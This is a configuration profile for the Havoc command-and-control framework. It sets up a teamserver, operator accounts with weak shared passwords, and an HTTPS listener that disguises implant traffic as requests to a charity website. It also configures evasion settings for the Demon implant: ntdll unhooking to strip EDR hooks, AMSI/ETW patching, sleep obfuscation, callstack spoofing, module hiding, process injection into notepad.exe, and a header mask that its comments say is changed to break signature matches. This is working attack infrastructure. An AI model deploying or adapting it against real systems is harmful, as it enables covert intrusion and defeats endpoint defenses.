Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    # [HVC-003] Per-packet XOR mask seed for outer header obfuscation. Optional.
    # Accepts hex ("0x...") or decimal. Must fit in 32 bits and be non-zero.
    # Default if omitted: 0xA3F1C2B4. Same value is propagated to every Demon
    # payload built by this teamserver via -DHEADER_MASK_SEED=... so wire format
    # round-trips. Change this to break signature matches against stock builds.
    # Value must be 8 characters after 0x..
    HeaderMaskSeed = "0x344cfbca"

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "kr0ff" {
        Password = "password1234"
    }

    user "Neo" {
        Password = "password1234"
    }
}

# this is optional. if you dont use it you can remove it.
Service {
    Endpoint = "service-endpoint"
    Password = "service-password"
}

Demon {
    Sleep = 10
    Jitter = 15

    IndirectSyscall  = true
    StackDuplication = true

    # Accepted: "WaitForSingleObjectEx", "Foliage", "Ekko", "Zilean"
    SleepTechnique = "Foliage"

    # Accepted: "None", "jmp rax", "jmp rbx" (only applies to Ekko/Zilean)
    SleepJmpGadget = "jmp rax"

    # Re-select a random gadget address each sleep cycle (Ekko/Zilean only, ignored by Foliage)
    RandGadget = true

    # Overwrite loaded ntdll .text with a clean copy from \KnownDlls at startup — removes EDR inline hooks
    UnhookNtdll = true

    # Unlink dynamically loaded modules from PEB InLoadOrderModuleList, InMemoryOrderModuleList, InInitializationOrderModuleList
    HideModules = true

    # Stomp PE header region during default sleep -- opt-in; leave false for injected payloads (ISS-037)
    PeStomp = true

    # Sleep obfuscation cipher: "RC4" (default, 16-byte key) or "ChaCha20" (32-byte key + 12-byte nonce)
    # This setting is authoritative -- the operator UI allows override per payload build.
    SleepCipher = "ChaCha20"

    # Enable verbose debug logging in the Demon agent at startup
    Verbose = false

    # Enable VEH (vectored exception handling) for BOF/object file loading (CoffeeLoader)
    CoffeeVeh = true

    # Enable threaded execution for BOF/object files (CoffeeLoader)
    CoffeeThreaded = true

    # HVC-046: Base delay (seconds) between injection stages (alloc -> protect -> execute); 0 = disabled
    ExecDelay = 10

    # HVC-046: Jitter percentage applied to ExecDelay (0-100); 0 = no jitter
    ExecDelayJitter = 25

    # Optional: custom thread start address for sleep obfuscation
    # When omitted the agent uses RtlUserThreadStart (the safe default)
    # SleepObfStartAddr {
    #     Library  = "ntdll.dll"
    #     Function = "RtlUserThreadStart"
    #     Offset   = 0
    # }

    # Optional: custom thread start address for injection spoofing
    # When omitted no spoof address is configured at build time (set via 'inject spoofaddr' at runtime)
    # InjectSpoofAddr {
    #     Library  = "kernel32.dll"
    #     Function = "GetModuleHandleA"
    #     Offset   = 0
    # }

    # HVC-047: injection thread callstack spoofing (Tier 2 SMR)
    # When StackDuplication=true, these configure TEB.Win32StartAddress and the
    # fake return-address chain written to the suspended thread's initial stack.
    # Defaults (when omitted) mimic a Windows thread-pool worker thread.
    # Defaults mimic a standard CreateThread-spawned thread (all functions exported):
    #   TEB.Win32StartAddress = kernel32!BaseThreadInitThunk
    #   Stack: BaseThreadInitThunk+0x14 / RtlUserThreadStart+0x21 / NULL (walk stops)
    # StackSpoofStartAddr {
    #     Library  = "kernel32.dll"
    #     Function = "BaseThreadInitThunk"
    #     Offset   = 0
    # }
    # StackSpoofFrame0 { Library = "kernel32.dll"; Function = "BaseThreadInitThunk"; Offset = 20  }
    # StackSpoofFrame1 { Library = "ntdll.dll";    Function = "RtlUserThreadStart";  Offset = 33  }
    # StackSpoofFrame2 { }  # empty = NULL, stack walk terminates here
    # StackSpoofFrame3 { }  # empty = NULL

    # Accepted: "None (LdrLoadDll)", "RtlRegisterWait", "RtlCreateTimer", "RtlQueueWorkItem"
    ProxyLoading = "RtlQueueWorkItem"

    # Accepted: "None", "HWBP", "Hardware breakpoints"
    AmsiEtwPatching = "HWBP"

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"

        # Accepted: "Win32", "Native/Syscall"
        Alloc   = "Native/Syscall"
        Execute = "Native/Syscall"
    }

    Binary {
        ReplaceStrings-x64 = {
            "demon.x64.dll": "",
            "This program cannot be run in DOS mode.": "",
        }

        ReplaceStrings-x86 = {
            "demon.x86.dll": "",
            "This program cannot be run in DOS mode.": "",
        }
    }
}

Listeners {
    Http {
		Name = "HTTP/S Agent"
		Hosts = [
			"192.168.100.3",
			]
		HostBind     = "0.0.0.0"
        	PortBind     = 443
        	PortConn     = 443
        	HostRotation = "round-robin"
        	Secure       = true
        	UserAgent    = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"

		Uris = [
            "/js/libs/jquery-1.6.3.min.js",
            "/contact-us.php",
            "/favicon.ico",
            "/blog/index.html",
            "/blog/category/united-states/index.html",
            "/blog/category/kenya/index.html",
            "/leadership/natalie-berg.php",
            "/sponsorships/index.html",
            "/sponsorships/charitable-institutions.php",
            "/mission.php",
            "/volunteer/index.html",
            "/projects/projects-us.php",
            "/projects/projects-ua.php",
            "/js/activatables.js"
        ]

        Headers = [
			"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
			"Accept-Language: en-US,en;q=0.5",
			"Accept-Encoding: gzip, deflate, br",
			"Upgrade-Insecure-Requests: 1",
			"Sec-Fetch-Dest: document",
			"Sec-Fetch-Mode: navigate",
			"Sec-Fetch-Site: none",
			"Sec-Fetch-User: ?1"
        ]

        Response {
            Headers = [
                "Server: Nginx",
                    "ETag: 5045-607fab0c09f00-gzip",
                    "Accept-Ranges: bytes",
                    "Vary: Accept-Encoding",
                ]
            }
	  }

    Smb {
        Name = "Smb"
        PipeName = "havocagent_01"
      }
}
